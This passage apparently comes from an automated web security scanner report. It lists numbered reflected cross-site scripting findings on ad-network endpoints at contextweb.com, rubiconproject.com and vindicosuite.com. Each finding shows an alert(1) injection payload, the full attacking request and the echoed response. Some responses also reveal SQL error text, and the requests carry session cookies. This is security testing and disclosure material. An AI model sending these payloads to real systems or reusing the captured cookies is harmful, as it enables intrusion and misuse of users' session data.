Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=292|1|-8589035730497595512|1; V=gFEcJzqCjXJj; cwbh1=2709%3B03%2F15%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F06%2F2011%3BFOCI1%0A749%3B02%2F19%2F2011%3BDOTM2%0A2532%3B03%2F15%2F2011%3BAMQU1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
CW-Server: CW-WEB29
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 01 Feb 2011 18:17:28 GMT
ETag: 1234736425
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5704
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 14 Feb 2011 01:36:40 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="526735d5805";alert(1)//d5cbc1d5373";var ct="80710";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase(
...[SNIP]...

1.261. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwpnet request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2115"%3balert(1)//841766d65cd was submitted in the cwpnet parameter. This input was echoed as d2115";alert(1)//841766d65cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=526735&cwwidth=300&cwheight=250&cwpnet=1d2115"%3balert(1)//841766d65cd&cwtagid=80710 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=292|1|-8589035730497595512|1; V=gFEcJzqCjXJj; cwbh1=2709%3B03%2F15%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F06%2F2011%3BFOCI1%0A749%3B02%2F19%2F2011%3BDOTM2%0A2532%3B03%2F15%2F2011%3BAMQU1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
CW-Server: CW-WEB20
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 01 Feb 2011 18:17:28 GMT
ETag: 1501704869
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5704
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 14 Feb 2011 01:36:41 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="526735";var ct="80710";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cn="1d2115";alert(1)//841766d65cd";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="undefined";var _cwn=naviga
...[SNIP]...

1.262. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwrun request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e2ab"%3balert(1)//3a23d9c523b was submitted in the cwrun parameter. This input was echoed as 2e2ab";alert(1)//3a23d9c523b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=2002e2ab"%3balert(1)//3a23d9c523b&cwadformat=300X250&cwpid=526735&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=80710 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=292|1|-8589035730497595512|1; V=gFEcJzqCjXJj; cwbh1=2709%3B03%2F15%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F06%2F2011%3BFOCI1%0A749%3B02%2F19%2F2011%3BDOTM2%0A2532%3B03%2F15%2F2011%3BAMQU1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB27
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 01 Feb 2011 18:17:28 GMT
ETag: -1603264243
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5704
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 14 Feb 2011 01:36:40 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="526735";var ct="80710";var cf="300X250";var ca="VIEWAD";var cr="2002e2ab";alert(1)//3a23d9c523b";var cw="300";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window
...[SNIP]...

1.263. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwtagid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload acba8"%3balert(1)//90c5667f5d3 was submitted in the cwtagid parameter. This input was echoed as acba8";alert(1)//90c5667f5d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=526735&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=80710acba8"%3balert(1)//90c5667f5d3 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=292|1|-8589035730497595512|1; V=gFEcJzqCjXJj; cwbh1=2709%3B03%2F15%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F06%2F2011%3BFOCI1%0A749%3B02%2F19%2F2011%3BDOTM2%0A2532%3B03%2F15%2F2011%3BAMQU1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB10
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 01 Feb 2011 18:17:28 GMT
ETag: 1225335531
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5704
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 14 Feb 2011 01:36:41 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="526735";var ct="80710acba8";alert(1)//90c5667f5d3";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var
...[SNIP]...

1.264. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwwidth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 342b1"%3balert(1)//732ac9a6f14 was submitted in the cwwidth parameter. This input was echoed as 342b1";alert(1)//732ac9a6f14 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=526735&cwwidth=300342b1"%3balert(1)//732ac9a6f14&cwheight=250&cwpnet=1&cwtagid=80710 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=292|1|-8589035730497595512|1; V=gFEcJzqCjXJj; cwbh1=2709%3B03%2F15%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F06%2F2011%3BFOCI1%0A749%3B02%2F19%2F2011%3BDOTM2%0A2532%3B03%2F15%2F2011%3BAMQU1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB27
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 01 Feb 2011 18:17:28 GMT
ETag: 1749599978
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5704
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 14 Feb 2011 01:36:40 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="526735";var ct="80710";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="300342b1";alert(1)//732ac9a6f14";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="un
...[SNIP]...

1.265. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tap.rubiconproject.com
Path:	/partner/agent/rubicon/channels.js

Issue detail

The value of the cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b959c%3balert(1)//31fa838f217 was submitted in the cb parameter. This input was echoed as b959c;alert(1)//31fa838f217 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partner/agent/rubicon/channels.js?cb=b959c%3balert(1)//31fa838f217&pc=6005/12414 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://intermrkts.vo.llnwd.net/o35/u/ExtraCode/DrudgeReport/intermarkets.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; put_2081=CA-00000000456885722; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_2132=D8DB51BF08484217F5D14AB47F4002AD; put_2100=usr3fd748acf5bcab14; put_1197=3297869551067506954; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_1994=6ch47d7o8wtv; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; xdp_ti="7 Feb 2011 22:48:47 GMT"; lm="7 Feb 2011 22:48:47 GMT"; csi15=667425.js^1^1297190267^1297190267&329267.js^1^1297190250^1297190250&3178297.js^1^1297190221^1297190221&3178300.js^1^1297186286^1297186286&3187866.js^2^1297186264^1297186285&3173809.js^1^1297186265^1297186265&3187311.js^2^1297186228^1297186247&3144082.js^1^1297186229^1297186229&3174520.js^1^1297185849^1297185849; csi2=3185375.js^3^1297190198^1297195331&3187864.js^6^1297186263^1297195302&329265.js^1^1297195268^1297195268&3140640.js^1^1297195255^1297195255&2415222.js^2^1297186265^1297186287&3162307.js^2^1297186245^1297186249&3187064.js^1^1297186232^1297186232&3138805.js^3^1297185842^1297186231&3144080.js^1^1297186227^1297186227&667421.js^1^1297186143^1297186143&3174518.js^1^1297185827^1297185827; put_1185=3011330574290390485; khaos=GIPAEQ2D-C-IOYY; cd=false; dq=42|5|37|0; ruid=154d290e46adc1d6f373dd09^15^1297646572^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ+PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6005/12414; rdk9=0; ses9=12414^1; csi9=3147455.js^1^1297646572^1297646572; rpb=2399%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%266286%3D1%266073%3D1%264214%3D1%262119%3D1%265722%3D1%264939%3D1%264940%3D1%264222%3D1%266457%3D1%266276%3D1%264212%3D1%266356%3D1%262372%3D1%264944%3D1%262374%3D1%264970%3D1%264894%3D1; put_1986=4760492999213801733

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:27:21 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/javascript;charset=UTF-8
Content-Length: 946
Cache-control: private
Set-Cookie: khaos=GIPAEQ2D-C-IOYY; Domain=.rubiconproject.com; Expires=Tue, 12-Feb-2019 01:27:21 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Connection: close

var oo_profile={
tokenType : "0",
tracking : "4944",
tags : "Mortgage Refinance,Small Business,Business,Finance and Money,Finance,Inferred Male",
tagcloud : [
{ tag: "Mortgage Refinan
...[SNIP]...
4,2201,3513,2202,2496,2202,2496,2203,2204,2189,2112,2497,2205,2355,2495,5838,3811,3512,2109,3812,2239,2190,2206,2113,2206,2113,4552,2765,6184,2240,4105,4193,2372,2373,2374,2375,"}
]
};

try {
b959c;alert(1)//31fa838f217(oo_profile);
} catch(ignore) {}

1.266. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://trk.vindicosuite.com
Path:	/Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the adRotationId request parameter is copied into the HTML document as plain text between tags. The payload dd59d<script>alert(1)</script>8144e049832 was submitted in the adRotationId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047dd59d<script>alert(1)</script>8144e049832&bannerCreativeAdModuleId=21772 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:41:55 GMT
Expires: Mon, 14 Feb 2011 01:41:55 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSQQTQBCC=PHCNDMJDEPBPDNELIDEAPDEJ; path=/
X-Powered-By: ASP.NET
Content-Length: 1444
Connection: keep-alive

<br>Error Description:Incorrect syntax near 'dd59d'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55, @bannerCreativeAdModuleId = 21772, @campaignId = 6468, @syndicationOutletId = 49160, @adrotationId = 13047dd59d<script>alert(1)</script>8144e049832, @ipAddress = '173.193.214.243', @sessionId = '969182383', @pixel = '0', @ipNumber = '2915161843', @referer = 'http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?banner
...[SNIP]...

1.267. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://trk.vindicosuite.com
Path:	/Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the bannerCreativeAdModuleId request parameter is copied into the HTML document as plain text between tags. The payload 3c753<script>alert(1)</script>e9addd225f2 was submitted in the bannerCreativeAdModuleId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&bannerCreativeAdModuleId=217723c753<script>alert(1)</script>e9addd225f2 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:42:08 GMT
Expires: Mon, 14 Feb 2011 01:42:09 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCCRTSCDC=DDKLPDEAFPAGBNIODELMLMFN; path=/
X-Powered-By: ASP.NET
Content-Length: 1442
Connection: keep-alive

<br>Error Description:Incorrect syntax near 'c753'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55, @bannerCreativeAdModuleId = 217723c753<script>alert(1)</script>e9addd225f2, @campaignId = 6468, @syndicationOutletId = 49160, @adrotationId = 13047, @ipAddress = '173.193.214.243', @sessionId = '71285301', @pixel = '0', @ipNumber = '2915161843', @referer = 'http://cache.vind
...[SNIP]...

1.268. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://trk.vindicosuite.com
Path:	/Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the campaignId request parameter is copied into the HTML document as plain text between tags. The payload f3b31<script>alert(1)</script>08a31efa6d8 was submitted in the campaignId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=6468f3b31<script>alert(1)</script>08a31efa6d8&adRotationId=13047&bannerCreativeAdModuleId=21772 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:41:40 GMT
Expires: Mon, 14 Feb 2011 01:41:41 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQCTSDDAB=CKHBBJJDLLFMBPOFCGGPPPLL; path=/
X-Powered-By: ASP.NET
Content-Length: 1444
Connection: keep-alive

<br>Error Description:Incorrect syntax near 'f3b31'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55, @bannerCreativeAdModuleId = 21772, @campaignId = 6468f3b31<script>alert(1)</script>08a31efa6d8, @syndicationOutletId = 49160, @adrotationId = 13047, @ipAddress = '173.193.214.243', @sessionId = '965860069', @pixel = '0', @ipNumber = '2915161843', @referer = 'http://cache.vindicosuite.com/Feeds/
...[SNIP]...

1.269. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://trk.vindicosuite.com
Path:	/Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the siteId request parameter is copied into the HTML document as plain text between tags. The payload e110e<script>alert(1)</script>58ad681b7d5 was submitted in the siteId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=55e110e<script>alert(1)</script>58ad681b7d5&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&bannerCreativeAdModuleId=21772 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69
